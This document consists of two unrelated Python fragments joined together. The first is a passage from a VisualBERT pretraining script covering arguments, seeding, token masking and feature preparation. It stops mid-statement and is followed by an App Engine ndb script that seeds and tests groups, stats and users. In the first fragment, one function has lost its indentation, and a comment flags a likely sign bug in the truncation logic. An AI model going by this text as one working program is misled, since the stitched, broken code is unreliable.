        "--max_seq_length",
        default=128,
        type=int,
        help="max length of each sequence")
    parser.add_argument(
        "--mask_prob",
        default=0.15,
        type=float,
        help="the probability of one word to be mask")
    parser.add_argument(
        "--train_batch_size",
        default=2,
        type=int,
        help="Batch size per GPU/CPU for training.", )
    parser.add_argument(
        "--eval_batch_size",
        default=2,
        type=int,
        # Fix: the original help text was copy-pasted from --train_batch_size
        # and wrongly said "for training".
        help="Batch size per GPU/CPU for evaluation.", )
    parser.add_argument(
        "--learning_rate",
        default=5e-5,
        type=float,
        help="The initial learning rate for Adam.")
    parser.add_argument(
        "--weight_decay",
        default=0.01,
        type=float,
        help="Weight decay if we apply some.")
    parser.add_argument(
        "--adam_epsilon",
        default=1e-6,
        type=float,
        help="Epsilon for Adam optimizer.")
    parser.add_argument(
        "--num_train_epochs",
        default=10,
        type=int,
        help="Total number of training epochs to perform.", )
    parser.add_argument(
        "--max_steps",
        default=-1,
        type=int,
        help="If > 0: set total number of training steps to perform. Override num_train_epochs.",
    )
    parser.add_argument(
        "--warmup_steps",
        default=10000,
        type=int,
        help="Linear warmup over warmup_steps.")
    parser.add_argument(
        "--logging_steps",
        type=int,
        default=100,
        help="Log every X updates steps.")
    parser.add_argument(
        "--save_steps",
        type=int,
        default=1000,
        help="Save checkpoint every X updates steps.")
    parser.add_argument(
        "--init_from_ckpt",
        action="store_true",
        help="Whether to load model checkpoint. if True, args.model_name_or_path must be dir store ckpt or will train from fresh start"
    )
    parser.add_argument(
        "--use_amp",
        action="store_true",
        help="Whether to use float16(Automatic Mixed Precision) to train.")
    parser.add_argument(
        "--seed", type=int, default=42, help="random seed for initialization")
    parser.add_argument(
        # Fix: was `type=bool`, for which "--eager_run False" parsed as True.
        "--eager_run", type=_str2bool, default=True, help="Use dygraph mode.")
    parser.add_argument(
        "--device",
        default="gpu",
        type=str,
        choices=["cpu", "gpu"],
        help="The device to select to train the model, is must be cpu/gpu.")
    args = parser.parse_args()
    return args
def set_seed(args):
    """Seed every RNG the trainer touches: python, numpy and paddle.

    The same data seed (for data shuffle) is used across all procs so the
    data stays consistent after sharding. Different per-proc op seeds (for
    dropout) could be derived instead via
    `paddle.seed(args.seed + paddle.distributed.get_rank())`.
    """
    # Seed in the same order the original did: random, numpy, paddle.
    for seeder in (random.seed, np.random.seed, paddle.seed):
        seeder(args.seed)
class WorkerInitObj(object):
    """Picklable per-worker seeding callable (e.g. for DataLoader workers).

    Each worker id receives a distinct, deterministic seed derived from the
    base seed supplied at construction time.
    """

    def __init__(self, seed):
        # Base seed; the worker id is added to it on every call.
        self.seed = seed

    def __call__(self, id):
        worker_seed = self.seed + id
        np.random.seed(seed=worker_seed)
        random.seed(worker_seed)
def perform_truncate(max_seq_length, text_a, text_b):
    # Truncate one or two token sequences toward max_seq_length, accounting
    # for the special tokens added later (2 for a single sequence, 3 for a
    # pair). Returns the (possibly shortened) (text_a, text_b).
    if text_b is None:
        len_total = len(text_a) + 2
        text_a = text_a[:max_seq_length - 2]
    else:
        len_total = len(text_a) + len(text_b) + 3
        if len_total > max_seq_length:
            # Take at most half the excess from the context, while always
            # keeping at least 32 context tokens.
            take_away_from_ctx = min((len_total - max_seq_length + 1) // 2,
                                     max(len(text_a) - 32, 0))
            # NOTE(review): `+ take_away_from_ctx` removes the excess PLUS the
            # context cut again from the answer, so the pair ends up shorter
            # than max_seq_length whenever the context is cut (and can still
            # exceed max_seq_length when text_b is short). This looks like it
            # should be `- take_away_from_ctx`; confirm against the upstream
            # VisualBERT preprocessing before changing behavior.
            take_away_from_answer = len_total - max_seq_length + take_away_from_ctx
            # Follows VCR, perform truncate from the front...
            text_a = text_a[take_away_from_ctx:]
            text_b = text_b[take_away_from_answer:]
    return text_a, text_b
def random_word(tokens, tokenizer, probability=0.15):
    """
    Randomly mask tokens for the masked-LM task, with the probabilities of
    the original BERT paper: each token is selected with `probability`; of
    the selected ones, 80% become "[MASK]", 10% become a random vocabulary
    token, 10% keep the current token. `tokens` is mutated in place.

    :param tokens: list of str, tokenized sentence.
    :param tokenizer: Tokenizer, object used for tokenization (we need it's vocab here)
    :param probability: per-token selection probability.
    :return: (list of str, list of int), masked tokens and related labels for
        LM prediction; unselected positions are labeled -1 (ignored by loss).
    """
    output_label = []
    for idx in range(len(tokens)):
        original = tokens[idx]
        draw = random.random()
        if draw >= probability:
            # Not selected: no prediction target at this position.
            output_label.append(-1)
            continue
        draw /= probability
        if draw < 0.8:
            # 80%: replace with the mask token.
            tokens[idx] = "[MASK]"
        elif draw < 0.9:
            # 10%: replace with a random token from the vocabulary.
            tokens[idx] = random.choice(
                list(tokenizer.vocab.idx_to_token.items()))[1]
        # remaining 10%: keep the current token unchanged.
        # The label is always the *original* token's id so the model learns
        # to predict it at this position.
        try:
            output_label.append(tokenizer.vocab[original])
        except KeyError:
            # For unknown words (should not occur with BPE vocab)
            output_label.append(tokenizer.vocab["[UNK]"])
            logger.warning(
                "Cannot find token '{}' in vocab. Using [UNK] insetad".
                format(original))
    return tokens, output_label
def prepare_train_features_single(example, tokenizer, is_two_sentence, args):
feature = None
image_feature_type = args.image_feature_type
if image_feature_type == "coco_detectron_fix_100":
image_id = example['image_id']
split_name = example['split_name']
image_file_name = "COCO_{}2014_{:0>12d}.npy".format(split_name,
image_id)
if "train" in image_file_name:
folder = osp.join(args.input_dir,
"data/detectron_fix_100/fc6/vqa/train2014")
elif "val" in image_file_name:
folder = osp.join(args.input_dir,
"data/detectron_fix_100/fc6/vqa/val2014")
image_feat_variable = np.load(osp.join(folder, image_file_name))
visual_token_type_ids = np.zeros(
image_feat_variable.shape[:-1], dtype=np.int64)
visual_attention_mask = np.ones(
image_feat_variable.shape[:-1], dtype=np.int64)
visual_embeds = image_feat_variable.copy()
visual_token_type_ids = visual_token_type_ids.copy()
visual_attention_mask = visual_attention_mask.copy()
elif image_feature_type == "coco_detectron_fix_144":
image_id = example['image_id']
split_name = example['split_name']
image_file_name = "COCO_{}2014_{:0>12d}.npy".format(split_name,
image_id)
if "train" in image_file_name:
folder = osp.join(
args.input_dir,
"data/detectron_fix_144/nlvr2/train/feature_1024dim")
elif "val" in image_file_name:
folder = osp.join(
args.input_dir,
"data/detectron_fix_144/nlvr2/val/feature_1024dim")
image_feat_variable = np.load(osp.join(folder, image_file_name))
visual_token_type_ids = np.zeros(
image_feat_variable.shape[:-1], dtype=np.int64)
visual_attention_mask = np.ones(
image_feat_variable.shape[:-1], dtype=np.int64)
visual_embeds = image_feat_variable.copy()
visual_token_type_ids = visual_token_type_ids.copy()
visual_attention_mask = visual_attention_mask.copy()
elif image_feature_type == "nlvr2_detectron_fix_144":
caption_a = example['caption_a']
label = example['label']
identifier = example['identifier']
feature_path_0 = example['feature_path_0']
feature_path_1 = example['feature_path_1']
if "train" in identifier:
folder = osp.join(args.input_dir,
"data/detectron_fix_144/train/feature_1024dim")
elif "dev" in identifier:
folder = osp.join(args.input_dir,
"data/detectron_fix_144/dev/feature_1024dim")
elif "test1" in identifier:
folder = osp.join(args.input_dir,
"data/detectron_fix_144/test1/feature_1024dim")
detectron_features_0 = np.load(os.path.join(folder, feature_path_0))
detectron_features_1 = np.load(os.path.join(folder, feature_path_1))
detectron_features = np.concatenate(
(detectron_features_0, detectron_features_1), axis=0)
visual_embeds = detectron_features.copy()
visual_embeddings_type_0 = np.zeros(
detectron_features_0.shape[0], dtype=np.int64)
visual_embeddings_type_1 = np.ones(
detectron_features_1.shape[0], dtype=np.int64)
visual_embeddings_type = np.concatenate(
(visual_embeddings_type_0, visual_embeddings_type_1),
axis=0,
dtype=np.int64)
visual_token_type_ids = visual_embeddings_type.copy()
visual_attention_mask = np.ones(
visual_embeds.shape[:-1], dtype=np.int64)
# example["visual_embeds"] = visual_embeds.copy()
# example["visual_token_type_ids"] = visual_token_type_ids.copy()
# example["visual_attention_mask"] = visual_attention_mask.copy()
else:
raise NotImplementedError("Please use image features from disk")
feature = OrderedDict({
"visual_embeds": visual_embeds,
"visual_token_type_ids": visual_token_type_ids,
"visual_attention_mask": visual_attention_mask
})
visual_len = feature["visual_embeds"].shape[0]
assert visual_len == 100 or visual_len == 144
# Two sentence:
# task1: masked language modeling
# task2: are those sampled two sentence matched both matched ?
# Single sentence:
# task1: masked language modeling
if is_two_sentence:
tokens_a = tokenizer.tokenize(example['caption_a'])
tokens_b = tokenizer.tokenize(example['caption_b'])
tokens_a, tokens_b = perform_truncate(args.max_seq_length, tokens_a,
tokens_b)
raw_tokens_a, raw_tokens_b = tokens_a.copy(), tokens_b.copy()
tokens_a, t1_label = random_word(tokens_a, tokenizer, args.mask_prob)
tokens_b, t2_label = random_word(tokens_b, tokenizer, args.mask_prob)
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = ([-1] + t1_label + [-1] + t2_label + [-1])
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
tokens = []
raw_tokens = []
token_type_ids = []
raw_token_type_ids = []
tokens.append("[CLS]")
raw_tokens.append("[CLS]")
token_type_ids.append(0)
raw_token_type_ids.append(0)
for token in tokens_a:
tokens.append(token)
token_type_ids.append(0)
for token in raw_tokens_a:
raw_tokens.append(token)
raw_token_type_ids.append(0)
tokens.append("[SEP]")
raw_tokens.append("[SEP]")
token_type_ids.append(0)
raw_token_type_ids.append(0)
for token in tokens_b:
tokens.append(token)
token_type_ids.append(1)
for token in raw_tokens_b:
raw_tokens.append(token)
raw_token_type_ids.append(1)
tokens.append("[SEP]")
raw_tokens.append("[SEP]")
token_type_ids.append(1)
raw_token_type_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
raw_input_ids = tokenizer.convert_tokens_to_ids(raw_tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
attention_mask = [1] * len(input_ids)
sentence_image_labels = np.array(
[1]) if example['is_correct'] == True else np.array([0])
while len(lm_label_ids) < len(tokens) + visual_len:
lm_label_ids.append(-1)
feature.update({
"tokens": tokens.copy(),
"visual_embeds": visual_embeds.copy(),
"raw_input_ids": raw_input_ids.copy(),
"input_ids": input_ids.copy(),
"token_type_ids": token_type_ids.copy(),
"attention_mask": attention_mask.copy(),
"labels": lm_label_ids.copy(),
"sentence_image_labels": sentence_image_labels.copy()
})
else:
if args.dataset == "vqa2":
question_tokens = example['question_str']
answers = example['answers']
answer = np.random.choice(answers)
tokens_a = tokenizer.tokenize(question_tokens) + tokenizer.tokenize(
answer)
elif args.dataset == "nlvr2":
tokens_a = tokenizer.tokenize(example['caption_a'])
else:
NotImplementedError(
"Unsupported dataset {} for single sentence language modeling".
format(args.dataset))
raw_tokens_a = tokens_a.copy()
tokens_a, t1_label = random_word(tokens_a, tokenizer, args.mask_prob)
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = ([-1] + t1_label + [-1])
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
tokens = []
raw_tokens = []
token_type_ids = []
raw_token_type_ids = []
tokens.append("[CLS]")
raw_tokens.append("[CLS]")
token_type_ids.append(0)
raw_token_type_ids.append(0)
for token in tokens_a:
tokens.append(token)
token_type_ids.append(0)
for token in raw_tokens_a:
raw_tokens.append(token)
raw_token_type_ids.append(0)
tokens.append("[SEP]")
raw_tokens.append("[SEP]")
token_type_ids.append(0)
raw_token_type_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
raw_input_ids = tokenizer.convert_tokens_to_ids(raw_tokens)
while len(lm_label_ids) < | |
<gh_stars>0
from models import *
from random import randint
FFBSKT_URL = '<KEY>'
BASKETBALL_GROUP_URL = '<KEY>'
def start(self):
    """Seed the datastore with the default groups and memberships.

    Clears existing state, then creates the baseline groups
    ('General parametrs', 'Basketball', 'Math', 'Gim', 'Tmp', 'Verify')
    and registers the initial admin objects in them.

    NOTE(review): each GroupStat uses positional-parallel lists —
    st_name / st_opt / st_ifbase must stay aligned index by index.
    """
    self.Clear(Answer())  # wipe current state before re-seeding
    #key = ndb.Key(Group, '<EMAIL>', Group, 'General parametrs')
    group = GroupStat(name='General parametrs', st_name=['name', 'content','rate'], st_opt=['name','0','hist'], st_ifbase=[True, True, True], role_propertys_add=[{'name':'admin', 'change':['content', 'rate', '@name'], 'visible': []}, {'name':'user' , 'change':['@content'], 'visible': ['name', 'content','rate']}])
    self.create_group(group)
    self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='General parametrs', group_creator='<EMAIL>', role='admin'))
    self.add_user(User(mail='@unknown', name='unknown')) # write timer for unknown
    group = GroupStat(name='Basketball', st_name=['name', 'rate', 'visit'], st_opt=['name','hist', 'hist'], st_ifbase=[True, True, False], role_propertys_add=[{'name':'admin', 'change':['visit', '@invite'], 'visible': ['name', 'rate']}, {'name':'user' , 'change':[], 'visible': ['name', 'rate', 'visit']}])
    self.create_group(group)
    group = GroupStat(name='Math', st_name=['name', 'rate','lesson_plus', 'hom_work', 'hom_work'], st_opt=['name','hist', '0','nero','ranking'], st_ifbase=[True, True, False, False, False], role_propertys_add=[{'name':'admin', 'change':['lesson_plus', 'hom_work'], 'visible': ['name']}, {'name':'user' , 'change':[], 'visible': ['name','rate', 'lesson_plus', 'hom_work']}])
    self.create_group(group)
    group = GroupStat(name='Gim', st_name=['name', 'visit', 'all_tickets'], st_opt=['name','0','0'], st_ifbase=[True, False, False], role_propertys_add=[{'name':'admin', 'change':['visit'], 'visible': ['name','all_tickets']}, {'name':'user' , 'change':[], 'visible': ['name', 'visit', 'all_tickets']}])
    self.create_group(group)
    group = GroupStat(name='Tmp', st_name=['name'], st_opt=['name'], st_ifbase=[True], role_propertys_add=[{'name':'admin', 'change':[], 'visible': []}, {'name':'user' , 'change':[], 'visible': ['name']}])
    self.create_group(group)
    self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Basketball', group_creator='<EMAIL>', role='admin'))
    group = GroupStat(name='Verify', st_name=['name', 'rate', 'name_verify', 'name_verify'], st_opt=['name','hist', 'nero','ranking'], st_ifbase=[True, True, False, False], role_propertys_add=[{'name':'admin', 'change':[], 'visible': ['name']}, {'name':'user' , 'change':['name_verify'], 'visible': ['name','rate']}])
    self.create_group(group)
    self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Verify', group_creator='<EMAIL>', role='admin'))
    #self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Basketball', group_creator='<EMAIL>', role='admin'))
    #group = GroupStat(name='Tornament', st_name=['name', 'avatar', 'content', 'rate'], st_opt=['0','0','photo','points'], st_ifbase=[True, True, True, True], role_propertys_add=[{'name':'referi', 'change':['points'], 'visible': ['name', 'avatar']}, {'name':'team' , 'change':[], 'visible': ['name', 'visit', 'all_tickets']}])
    #self.create_group(group)
#st_name - add all teams score, and points
#------------------------------------------------------TESTS__________________________________________------
def T_f(self, param={'mail':'<EMAIL>'}, mescls=User, f='add_user'):
print '$$ T_f ', f
u = mescls(**param)
T={}
getattr(self, f)(u)
def T_rating_test(self):
    """Exercise ranking stats end to end: create an 'RT La' group with
    three ranking stats (1km, 400m, jump), enrol users, write random
    results via add_stat, then recompute rates with Show.compute_rate.
    """
    param={'name':'RT La', 'st_name':['name', 'avatar', '1km', '400m', 'jump'], 'st_opt':['0', 'photo', 'ranking','ranking','ranking'], 'st_place':[1,1,2], 'st_w':[2.0,3.0,4.0], 'st_ifbase':[True,True,False,False,False], 'role_propertys_add':[{'name':'admin', 'change':['1km', '400m', 'jump','@invite'] , 'visible': ['name']}, {'name':'@open', 'change':[],'visible': ['name','1km', '400m', 'jump']}]}
    T_f(self, param=param, mescls=GroupStat, f='create_group')
    print "TEST______________"
    T_f(self, param={'child_object':'<EMAIL>', 'group_name':'RT La', 'group_creator':'<EMAIL>', 'role':'admin'}, mescls=PutObjectTo, f='put_object_to_group')
    T_f(self, param={'child_object':'<EMAIL>', 'group_name':'RT La', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
    #Need group url in st_block and obj url
    T_f(self, param={'url':'<KEY>', 'stat_block':[{'group_url':'<KEY>', 'return_ch':[0], 'st_name':['1km'], 'st_def':['456'], 'st_opt':['ranking']}, ]}, mescls=User, f='edit_user')
    T_f(self, param={'group_url':'<KEY>'}, mescls=Show, f='compute_rate')
    # group_url is only used by the commented-out variant below
    group_url = ndb.Key(Group, '<EMAIL>', Group, 'RT La').urlsafe()
    for user in ['a@','b@','c@','d@']:
        T_f(self, param={'child_object':user, 'group_name':'RT La', 'group_creator':'<EMAIL>', 'role':'admin'}, mescls=PutObjectTo, f='put_object_to_group')
        #param={'url':ndb.Key(Base, user).urlsafe(), 'stat_block':[{'group_url':group_url, 'return_ch':[0,1,2], 'st_name':['1km', '400m', 'jump'], 'st_def':[str(randint(240, 340)/60.0), str(randint(45, 80)), str(randint(140, 240))], 'st_opt':['ranking', 'ranking', 'ranking']}, ]}
    # three rounds of random results for every member
    for res in range(3):
        add_stat(['a@','b@','c@','d@', '<EMAIL>'], 'RT La', param, self, )
    T_f(self, param={'group_url':ndb.Key(Group, '<EMAIL>', Group, 'RT La').urlsafe()}, mescls=Show, f='compute_rate')
def add_stat(users, group, param, self, athors=[], group_creator='<EMAIL>'):
    """Write a random result for every 'ranking' stat in ``param`` for each
    user (or authored sub-group) and submit it through the edit_user handler.

    :param users: ids of the objects to update.
    :param group: name of the group the stats belong to.
    :param param: group schema dict; only entries whose st_opt is
        'ranking' receive a random value in [0, 40].
    :param athors: optional list of group authors paired with ``users``
        when the objects are sub-groups rather than plain users.
    NOTE(review): mutable default ``athors=[]`` — harmless here because
    the list is never mutated, but a None default would be safer.
    """
    urls = []
    group_url = ndb.Key(Group, group_creator, Group, group).urlsafe()
    if athors == []:
        # plain users: key by Base id
        for user in users:
            urls.append(ndb.Key(Base, user).urlsafe())
    else:
        # authored sub-groups: key by (author, name)
        for user, auth in zip(users, athors):
            urls.append(ndb.Key(Group, auth, Group, user).urlsafe())
    for url in urls:
        print "-__________", urls, group, group_url, ndb.Key(ObjectToGroup, group_url, ObjectToGroup, url).get()
        #user_url = ndb.Key(ObjectToGroup, group_url, ObjectToGroup, url).urlsafe()
        user_param={'url':url, 'stat_block':[{'group_url':group_url, 'return_ch':[], 'st_name':[], 'st_def':[], 'st_opt':[]}]}
        # j indexes only the 'ranking' columns that actually get a value
        j=0
        for i, par in enumerate(param['st_opt']):
            if par == 'ranking':
                user_param['stat_block'][0]['st_def'].append(str(randint(0, 40)))
                user_param['stat_block'][0]['return_ch'].append(j)
                user_param['stat_block'][0]['st_name'].append(param['st_name'][i])
                user_param['stat_block'][0]['st_opt'].append('ranking')
                j+=1
        T_f(self, param=user_param, mescls=User, f='edit_user')
        print "ADD STAT", user_param
#-----------------------Group Structure Test---------------------------------------------------------
def put_to(child, gr_name, ch_aut='<EMAIL>', gr_aut='<EMAIL>', role='group'):
    """Build the kwargs bundle for a put_object_to_group call.

    Returns a dict holding the message parameters, the message class and
    the handler name, ready to be splatted into ``T_f(self, **put_to(...))``.
    """
    message_params = {
        'child_object': child,
        'child_gr_author': ch_aut,
        'group_name': gr_name,
        'group_creator': gr_aut,
        'role': role,
    }
    return {'param': message_params, 'mescls': PutObjectTo, 'f': 'put_object_to_group'}
#T_f(self, , param=param, mescls=PutObjectTo, f='put_object_to_group')
def T_group_structure(self, ):
    """Build a nested group hierarchy (Sport -> Bskt -> Tornament -> Teams,
    plus Normatives/Referi side branches), enrol test users into the teams
    with player/crowd/participant roles, and seed Team2 with random stats.
    """
    T_f(self, param={'name':'Sport', 'st_name':['name', 'popularity', 'activity'], 'st_opt':['name', 'ranking','ranking'], 'st_place':[2,2], 'st_w':[1.0,2.0], 'st_ifbase':[True,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name','popularity', 'activity']}]}, mescls=GroupStat, f='create_group')
    # Add weight like for level
    T_f(self, param={'name':'Bskt', 'st_name':['name', 'level'], 'st_opt':['0', 'ranking'], 'st_place':[2], 'st_w':[1.0], 'st_ifbase':[True,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name','level']}]}, mescls=GroupStat, f='create_group')
    T_f(self, param={'name':'Normatives', 'st_name':['name', '1km', '400m', 'jump'], 'st_opt':['name', 'ranking', 'ranking', 'ranking'], 'st_place':[1,1,2], 'st_w':[2.0,3.0,4.0], 'st_ifbase':[True,False,False,False], 'role_propertys_add':[{'name':'participant', 'change':[],'visible': ['name','1km', '400m', 'jump']}, {'name':'@open', 'change':[],'visible': ['name','1km', '400m', 'jump']}]}, mescls=GroupStat, f='create_group')
    T_f(self, param={'name':'Referi', 'st_name':['name', 'games', 'mark', 'mark'], 'st_opt':['name', 'ranking', 'ranking', 'nero'], 'st_place':[2,2], 'st_w':[1.0, 2.0], 'st_ifbase':[True,False,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name', 'games', 'mark']}]}, mescls=GroupStat, f='create_group')
    T_f(self, param={'name':'BsktNormatives', 'st_name':['name', 'freethrow', '3points', '8flors'], 'st_opt':['name', 'ranking','ranking','ranking'], 'st_place':[2,2,1], 'st_w':[1.0,1.3,1.4], 'st_ifbase':[True,False,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name', 'freethrow', '3points', '8flors']}]}, mescls=GroupStat, f='create_group')
    T_f(self, param={'name':'Tornament', 'st_name':['name', 'games', 'vin'], 'st_opt':['name', '0', 'ranking'], 'st_place':[2], 'st_w':[1.0], 'st_ifbase':[True,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name', 'games', 'vin']}]}, mescls=GroupStat, f='create_group')
    # One shared schema dict, renamed per team before each create_group.
    param={'name':'Team2', 'st_name':['name', 'games', 'points', 'role', 'cr'], 'st_opt':['name', '0', 'ranking', '0','0'], 'st_place':[2], 'st_w':[1.0], 'st_ifbase':[True,False,False,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name', 'games', 'points', 'role']}, {'name':'player', 'change':[],'visible': ['name', 'games', 'points', 'role']}, {'name':'crowd','change':[],'visible': ['name', 'cr', 'points']}]}
    for team in ['Team1', 'Team2', 'Team3']:
        param['name'] = team
        T_f(self, param=param, mescls=GroupStat, f='create_group')
    #T_f(self, param=param, mescls=GroupStat, f='create_group')
    #T_f(self, param=param, mescls=GroupStat, f='create_group')
    #put groups
    T_f(self, **put_to(child='Normatives', gr_name='Sport'))
    T_f(self, **put_to(child='Referi', gr_name='Normatives'))
    T_f(self, **put_to(child='Bskt', gr_name='Sport'))
    T_f(self, **put_to(child='Referi', gr_name='Bskt'))
    T_f(self, **put_to(child='BsktNormatives', gr_name='Bskt'))
    T_f(self, **put_to(child='Tornament', gr_name='Bskt'))
    T_f(self, **put_to(child='Team1', gr_name='Tornament'))
    T_f(self, **put_to(child='Team2', gr_name='Tornament'))
    T_f(self, **put_to(child='Team3', gr_name='Tornament'))
    #put users
    T_f(self, param={'child_object':'<EMAIL>', 'group_name':'General parametrs', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
    T_f(self, param={'child_object':'<EMAIL>', 'group_name':'Tornament', 'group_creator':'<EMAIL>', 'role':'__creator'}, mescls=PutObjectTo, f='put_object_to_group')
    for user in ['cr1@','cr2@','cr3@','cr4@','cr5@','bpl1@','bpl2@','bpl3@','bpl4@','bpl5@',
                 'bpl6@','bpl7@','bpl8@','bpl9@','bpl10@','la1@','la2@','la3@']:
        T_f(self, param={'child_object':user, 'group_name':'General parametrs', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
    #for user in ['bpl1@','bpl2@','bpl3@']:
    #T_f(self, param={'child_object':user, 'group_name':'Team3', 'group_creator':'<EMAIL>', 'role':'player'}, mescls=PutObjectTo, f='put_object_to_group')
    for user in ['bpl4@','bpl5@','bpl6@']:
        T_f(self, param={'child_object':user, 'group_name':'Team1', 'group_creator':'<EMAIL>', 'role':'player'}, mescls=PutObjectTo, f='put_object_to_group')
    for user in ['cr1@','cr2@','cr3@','<EMAIL>']:
        T_f(self, param={'child_object':user, 'group_name':'Team1', 'group_creator':'<EMAIL>', 'role':'crowd'}, mescls=PutObjectTo, f='put_object_to_group')
    for user in ['bpl7@','bpl8@','bpl9@']:
        T_f(self, param={'child_object':user, 'group_name':'Team2', 'group_creator':'<EMAIL>', 'role':'player'}, mescls=PutObjectTo, f='put_object_to_group')
    for user in ['bpl1@','la1@','la2@','la3@']:
        T_f(self, param={'child_object':user, 'group_name':'Normatives', 'group_creator':'<EMAIL>', 'role':'participant'}, mescls=PutObjectTo, f='put_object_to_group')
    #T_f(self, param={'child_object':'<EMAIL>', 'group_name':'RT La', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
    # NOTE(review): `param` is the Team schema at this point (its 'points'
    # column is the only 'ranking' stat add_stat will fill).
    add_stat(['bpl7@','bpl8@','bpl9@'], 'Team2', param, self)
#___________________________________________________________________________________________________
def T_high_perfomance(self):
    """Load test: generate 240 (12 x 20) synthetic user ids and fire a
    use_card message for each against the Basketball group.

    Most of the set-up calls are commented out; only the use_card loop is
    active. NOTE: the name misspells "performance" but is kept for
    compatibility with existing callers.
    """
    #print '111', 'qwertyuiopasdfghjklzxcvbnm'
    #T_f(self, param={'user_url':FFBSKT_URL, 'is_add': True, 'group':BASKETBALL_GROUP_URL, 'role':'__id'}, mescls=EditRole, f='edit_role')
    for i in 'qwertyuiopas':
        for j in 'qwertyuiopasdfghjklz':
            #print i+j+k+'@'
            pass
            #T_f(self, param={'child_object':i+j+'@', 'group_name':'General parametrs', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
            #T_f(self, param={'child_object':i+j+'@', 'group_name':'Basketball', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
            # url is currently unused (consumer call is commented out)
            url = ndb.Key(Base, i+j+'@').urlsafe()
            #T_f(self, param={'child_object':url, 'attribute_name': 'name', 'value':i+j}, mescls=EditEntityAttr, f='edit_entity_value')
    # card ids start at 34 and increment per generated user
    cid = 34
    for i in 'qwertyuiopas':
        for j in 'qwertyuiopasdfghjklz':
            T_f(self, param={'card_id':str(cid), 'child_object':i+j+'@', 'group_url':BASKETBALL_GROUP_URL, 'stat_pls':'visit'}, mescls=CardId, f='use_card')
            cid += 1
def T_show(self, name1, name2, p=None):
    """Debug dump: print the Group keyed by ``name2`` and the
    ObjectToGroup links between ``name1`` and ``name2``.

    :param p: optional parent id for the ObjectToGroup key lookup;
        defaults to ``name2`` when falsy.
    """
    if not p:
        p=name2
    #print '--T Show', repr(name1)
    #print len(ndb.Key(Base, name1).get().a_f)
    print 'group = ', ndb.Key(Group, name2).get()
    print ndb.Key(ObjectToGroup, name1, ObjectToGroup, p).get()
    print '\no b j ', (ObjectToGroup.query(ObjectToGroup.name==name1, ObjectToGroup.group_name==name2).fetch())
    #(ObjectToGroup.query(ObjectToGroup.name==name1).filter(ObjectToGroup.group_name==name2).fetch())
def T_remove_all(self, message):
    """Wipe every stored entity of the four core model kinds
    (Base, ObjectToGroup, Group, NeroStat).

    The previous implementation called ``ndb.put_multi(entr)`` purely to
    obtain the entities' keys, which re-wrote every entity (one datastore
    write per row) immediately before deleting it. Collecting
    ``entity.key`` directly yields the same keys with no writes.

    :param message: unused; kept for handler-signature compatibility.
    """
    for model in (Base, ObjectToGroup, Group, NeroStat):
        entities = model.query().fetch()
        # Delete by key; no need to re-persist entities first.
        ndb.delete_multi([entity.key for entity in entities])
def T_in_out_group(self, message):
    """Create a 'Tparent' group with three children whose role permissions
    differ, then drive test_ask_put join/invite scenarios against each
    (test_ask_put is defined elsewhere in this module).

    :param message: unused; kept for handler-signature compatibility.
    """
    gp=GroupStat(name='Tparent', st_name=['lesson_remain', 'lesson_value'], role_propertys_add=[{'name':'admin' , 'change':['lesson_value','@invite', 'lesson_remain'] , 'visible': ['name']},{'name':'user' , 'change':['@name','@content'] , 'visible': ['lesson_remain', 'lesson_value']}])
    self.create_group(gp)
    ga=GroupStat(name='TchildA', parent_group='Tparent', st_name=['lesson_remain', 'lesson_value'], role_propertys_add=[{'name':'admin' , 'change':['lesson_value','@invite', 'lesson_remain'] , 'visible': ['name']},{'name':'user' , 'change':['@name','@content'] , 'visible': ['lesson_remain', 'lesson_value']}])
    self.create_group(ga)
    gb=GroupStat(name='TchildB', parent_group='Tparent', st_name=['lesson_remain', 'lesson_value'], role_propertys_add=[{'name':'admin' , 'change':['@invite'] , 'visible': ['name']},{'name':'user' , 'change':['@name','@content', 'lesson_value', 'lesson_remain'] , 'visible': ['lesson_remain', 'lesson_value']}])
    self.create_group(gb)
    gc=GroupStat(name='TchildC', parent_group='Tparent', st_name=[], role_propertys_add=[{'name':'ara' , 'change':['content'] , 'visible': ['name']}])
    self.create_group(gc)
    test_ask_put(self, gname='Tparent', observer='test_a_u@')
    #print
    # TchildA is asked twice with invite=True (first and last call below)
    test_ask_put(self, gname='TchildA',observer='test_a_u@', invite=True)
    #time.sleep(3)
    test_ask_put(self, gname='TchildB',observer='test_a_u@')
    #time.sleep(3)
    test_ask_put(self, gname='TchildC',observer='test_a_u@')
    test_ask_put(self, gname='TchildA',observer='test_a_u@', invite=True)
def card_test_prepare(self, message):
    """Set up group 'A' with an admin and a user, then exercise use_card
    both with an explicit child_object and without one.

    :param message: unused; kept for handler-signature compatibility.
    """
